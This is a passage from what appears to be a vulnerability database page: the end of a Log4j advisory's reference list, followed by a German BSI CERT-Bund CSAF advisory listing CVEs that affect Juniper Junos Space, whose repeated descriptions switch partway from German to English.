"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html" }, { "type": "WEB", "url": 
"http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/171626/AD-Manager-Plus-7122-Remote-Code-Execution.html" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2022/Dec/2" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2022/Jul/11" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2022/Mar/23" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/12/10/1" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/12/10/2" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/12/10/3" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/12/13/1" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/12/13/2" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/12/14/4" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/12/15/3" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "type": "CVSS_V3" } ], "summary": "Remote code injection in Log4j" }
wid-sec-w-2023-0063
Vulnerability from csaf_certbund
Notes
{ "document": { "aggregate_severity": { "text": "hoch" }, "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "de-DE", "notes": [ { "category": "legal_disclaimer", "text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen." }, { "category": "description", "text": "Junos Space ist eine Software-Plattform, die eine Reihe von Applikationen f\u00fcr das Netzwerkmanagement beinhaltet.", "title": "Produktbeschreibung" }, { "category": "summary", "text": "Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter anonymer, authentisierter oder lokaler Angreifer kann mehrere Schwachstellen in Juniper Junos Space ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern.", "title": "Angriff" }, { "category": "general", "text": "- Juniper Appliance", "title": "Betroffene Betriebssysteme" } ], "publisher": { "category": "other", "contact_details": "csaf-provider@cert-bund.de", "name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik", "namespace": "https://www.bsi.bund.de" }, "references": [ { "category": "self", "summary": "WID-SEC-W-2023-0063 - CSAF Version", "url": "https://wid.cert-bund.de/.well-known/csaf/white/2022/wid-sec-w-2023-0063.json" }, { "category": "self", "summary": "WID-SEC-2023-0063 - Portal Version", "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2023-0063" }, { "category": "external", "summary": "Juniper Security Advisory JSA70182 vom 2023-01-12", "url": 
"https://supportportal.juniper.net/s/article/2023-01-Security-Bulletin-Contrail-Service-Orchestration-Multiple-vulnerabilities-resolved-in-CSO-6-3-0?language=en_US" }, { "category": "external", "summary": "Juniper Security Advisory vom 2022-01-12", "url": "https://kb.juniper.net/InfoCenter/index?page=content\u0026id=JSA11287\u0026cat=SIRT_1" } ], "source_lang": "en-US", "title": "Juniper Junos Space: Mehrere Schwachstellen", "tracking": { "current_release_date": "2023-01-11T23:00:00.000+00:00", "generator": { "date": "2024-08-15T17:41:07.526+00:00", "engine": { "name": "BSI-WID", "version": "1.3.5" } }, "id": "WID-SEC-W-2023-0063", "initial_release_date": "2022-01-12T23:00:00.000+00:00", "revision_history": [ { "date": "2022-01-12T23:00:00.000+00:00", "number": "1", "summary": "Initiale Fassung" }, { "date": "2023-01-11T23:00:00.000+00:00", "number": "2", "summary": "Neue Updates von Juniper aufgenommen" } ], "status": "final", "version": "2" } }, "product_tree": { "branches": [ { "branches": [ { "category": "product_name", "name": "Juniper Contrail Service Orchestration", "product": { "name": "Juniper Contrail Service Orchestration", "product_id": "T025794", "product_identification_helper": { "cpe": "cpe:/a:juniper:contrail_service_orchestration:-" } } }, { "category": "product_name", "name": "Juniper Junos Space \u003c 21.3R1", "product": { "name": "Juniper Junos Space \u003c 21.3R1", "product_id": "T021576", "product_identification_helper": { "cpe": "cpe:/a:juniper:junos_space:21.3r1" } } } ], "category": "vendor", "name": "Juniper" } ] }, "vulnerabilities": [ { "cve": "CVE-2019-17543", "notes": [ { "category": "description", "text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. 
Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2019-17543" }, { "cve": "CVE-2019-20934", "notes": [ { "category": "description", "text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2019-20934" }, { "cve": "CVE-2020-0543", "notes": [ { "category": "description", "text": "In Juniper Junos Space existieren mehrere Schwachstellen. 
Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2020-0543" }, { "cve": "CVE-2020-0548", "notes": [ { "category": "description", "text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte." 
} ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2020-0548" }, { "cve": "CVE-2020-0549", "notes": [ { "category": "description", "text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2020-0549" }, { "cve": "CVE-2020-11022", "notes": [ { "category": "description", "text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. 
Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2020-11022" }, { "cve": "CVE-2020-11023", "notes": [ { "category": "description", "text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2020-11023" }, { "cve": "CVE-2020-11668", "notes": [ { "category": "description", "text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. 
Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2020-11668" }, { "cve": "CVE-2020-11984", "notes": [ { "category": "description", "text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2020-11984" }, { "cve": "CVE-2020-11993", "notes": [ { "category": "description", "text": "In Juniper Junos Space existieren mehrere Schwachstellen. 
Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2020-11993" }, { "cve": "CVE-2020-12362", "notes": [ { "category": "description", "text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte." 
} ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2020-12362" }, { "cve": "CVE-2020-12363", "notes": [ { "category": "description", "text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2020-12363" }, { "cve": "CVE-2020-12364", "notes": [ { "category": "description", "text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. 
Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2020-12364" }, { "cve": "CVE-2020-1927", "notes": [ { "category": "description", "text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2020-1927" }, { "cve": "CVE-2020-1934", "notes": [ { "category": "description", "text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. 
Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2020-1934" }, { "cve": "CVE-2020-24489", "notes": [ { "category": "description", "text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2020-24489" }, { "cve": "CVE-2020-24511", "notes": [ { "category": "description", "text": "In Juniper Junos Space existieren mehrere Schwachstellen. 
Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2020-24511" }, { "cve": "CVE-2020-24512", "notes": [ { "category": "description", "text": "In Juniper Junos Space existieren mehrere Schwachstellen. Die Fehler existieren in verschiedenen Komponenten und Bibliotheken, darunter LZ4, Linux Kernel, Intel Prozessoren, Apache HTTP Server, BIND, Intel VT-d, Intel Grafiktreiber, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j und logback. Ein Angreifer aus dem angrenzenden Netzwerk oder ein entfernter, anonymer, authentisierter oder lokaler Angreifer kann diese Schwachstellen ausnutzen, um Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand auszul\u00f6sen, beliebigen Code auszuf\u00fchren und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion und erh\u00f6hte Rechte." 
} ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2020-24512" }, { "cve": "CVE-2020-27170", "notes": [ { "category": "description", "text": "Multiple vulnerabilities exist in Juniper Junos Space. The flaws exist in various components and libraries, including LZ4, Linux Kernel, Intel processors, Apache HTTP Server, BIND, Intel VT-d, Intel graphics drivers, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j and logback. An attacker on the adjacent network, or a remote, anonymous, authenticated or local attacker, can exploit these vulnerabilities to bypass security measures, disclose confidential information, cause a denial-of-service condition, execute arbitrary code and escalate privileges. Successful exploitation of some of these vulnerabilities requires user interaction and elevated privileges." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2020-27170" }, { "cve": "CVE-2020-27777", "notes": [ { "category": "description", "text": "Multiple vulnerabilities exist in Juniper Junos Space. The flaws exist in various components and libraries, including LZ4, Linux Kernel, Intel processors, Apache HTTP Server, BIND, Intel VT-d, Intel graphics drivers, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j and logback. An attacker on the adjacent network, or a remote, anonymous, authenticated or local attacker, can exploit these vulnerabilities to bypass security measures, disclose confidential information, cause a denial-of-service condition, execute arbitrary code and escalate privileges. 
Successful exploitation of some of these vulnerabilities requires user interaction and elevated privileges." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2020-27777" }, { "cve": "CVE-2020-29443", "notes": [ { "category": "description", "text": "Multiple vulnerabilities exist in Juniper Junos Space. The flaws exist in various components and libraries, including LZ4, Linux Kernel, Intel processors, Apache HTTP Server, BIND, Intel VT-d, Intel graphics drivers, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j and logback. An attacker on the adjacent network, or a remote, anonymous, authenticated or local attacker, can exploit these vulnerabilities to bypass security measures, disclose confidential information, cause a denial-of-service condition, execute arbitrary code and escalate privileges. Successful exploitation of some of these vulnerabilities requires user interaction and elevated privileges." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2020-29443" }, { "cve": "CVE-2020-8625", "notes": [ { "category": "description", "text": "Multiple vulnerabilities exist in Juniper Junos Space. The flaws exist in various components and libraries, including LZ4, Linux Kernel, Intel processors, Apache HTTP Server, BIND, Intel VT-d, Intel graphics drivers, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j and logback. 
An attacker on the adjacent network, or a remote, anonymous, authenticated or local attacker, can exploit these vulnerabilities to bypass security measures, disclose confidential information, cause a denial-of-service condition, execute arbitrary code and escalate privileges. Successful exploitation of some of these vulnerabilities requires user interaction and elevated privileges." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2020-8625" }, { "cve": "CVE-2020-8648", "notes": [ { "category": "description", "text": "Multiple vulnerabilities exist in Juniper Junos Space. The flaws exist in various components and libraries, including LZ4, Linux Kernel, Intel processors, Apache HTTP Server, BIND, Intel VT-d, Intel graphics drivers, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j and logback. An attacker on the adjacent network, or a remote, anonymous, authenticated or local attacker, can exploit these vulnerabilities to bypass security measures, disclose confidential information, cause a denial-of-service condition, execute arbitrary code and escalate privileges. Successful exploitation of some of these vulnerabilities requires user interaction and elevated privileges." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2020-8648" }, { "cve": "CVE-2020-8695", "notes": [ { "category": "description", "text": "Multiple vulnerabilities exist in Juniper Junos Space. 
The flaws exist in various components and libraries, including LZ4, Linux Kernel, Intel processors, Apache HTTP Server, BIND, Intel VT-d, Intel graphics drivers, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j and logback. An attacker on the adjacent network, or a remote, anonymous, authenticated or local attacker, can exploit these vulnerabilities to bypass security measures, disclose confidential information, cause a denial-of-service condition, execute arbitrary code and escalate privileges. Successful exploitation of some of these vulnerabilities requires user interaction and elevated privileges." } ], "product_status": { "known_affected": [ "T025794" ] }, "release_date": "2022-01-12T23:00:00.000+00:00", "title": "CVE-2020-8695" }, { "cve": "CVE-2020-8696", "notes": [ { "category": "description", "text": "Multiple vulnerabilities exist in Juniper Junos Space. The flaws exist in various components and libraries, including LZ4, Linux Kernel, Intel processors, Apache HTTP Server, BIND, Intel VT-d, Intel graphics drivers, KVM Hypervisor, QEMU, Java SE, MySQL Server, samba, curl, GNOME, jQuery, Apache Log4j and logback. An attacker on the adjacent network, or a remote, anonymous, authenticated or local attacker, can exploit these vulnerabilities to bypass security measures, disclose confidential information, cause a denial-of-service condition, execute arbitrary code and 